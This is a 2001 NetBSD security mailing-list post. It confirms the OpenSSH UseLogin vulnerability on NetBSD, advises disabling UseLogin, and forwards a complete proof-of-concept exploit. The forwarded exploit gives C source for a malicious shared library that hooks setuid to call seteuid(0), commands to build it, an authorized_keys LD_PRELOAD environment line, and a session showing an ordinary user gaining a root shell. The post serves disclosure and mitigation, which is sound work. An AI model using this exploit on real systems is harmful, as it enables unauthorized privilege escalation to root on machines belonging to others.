Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <tech-security@netbsd.org>
From: Lubomir Sedlacik <salo@Xtrmntr.org>
List: tech-security
Date: 12/06/2001 02:49:49
--8GpibOaaTibBMecb
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
hi,
confirmed on:
NetBSD 1.5X - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614
everyone who use "UseLogin yes" and have key authentication allowed for loc=
al
users, please at least set "UseLogin no" or comment it out.
----- Forwarded message from "[WaR]" <war@genhex.org> -----
Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <war@genhex.org>
To: vuln-dev@securityfocus.com
Subject: OpenSSH UseLogin proof of concept exploit
--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <war@genhex.org> / http://www.genhex.org
--[ Intro ]--
I was very curious in finding out how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.
This is based on libroot from squidge@onyx.infonexus.com,
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).
Kudos to pmsac@toxyn.org for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
the seteuid(0) (it originally was a system("/bin/sh");).
--[ Code ]--
Create a lib.c file with the next content:
---8<---
#include <stdio.h>
int setuid(int uid){
printf("setuid() called...\n");
seteuid(0);
}
---8<---
Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so
Now, for the tricky (*g*) part...
You must have an account on the machine, and create an entry
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment=3D"LD_PRELOAD=3D<your home>/libroot.so" <your public key>
When sshd receives your connection, it will export this variable
into the environment *BEFORE* running login. Somewhere after this,
it executes a setuid. When it does, it makes a seteuid(0).
$ id
uid=3D1000(war) gid=3D100(users) groups=3D100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=3D0(root) gid=3D100(users) groups=3D100(users)
It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can setup the enviroment, and login.
And obviously (duh) it must have UseLogin enabled.
That's all.
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR]
"if you can't hack it, hit it with a hammer"
----- End forwarded message -----
regards,
--=20
-- Lubomir Sedlacik <salo@Xtrmntr.org> ASCII Ribbon campaign against /"\=
--
-- <salo@silcnet.org> e-mail in gratuitous HTML and \ /=
--
-- Microsoft proprietary formats X =
--
-- PGPkey: http://Xtrmntr.org/salo.pgp / \=
--
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF 716E 59CE B70B 7E3B 70E2 =
--
--8GpibOaaTibBMecb
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (NetBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE8Ds69Wc63C347cOIRAv82AJ9d3GZZTnQVTicuPJ4E0FL/hNglUQCeJA7f
wE//WZtoVtbmP3Jp30M8zlw=
=Zrrl
-----END PGP SIGNATURE-----
--8GpibOaaTibBMecb--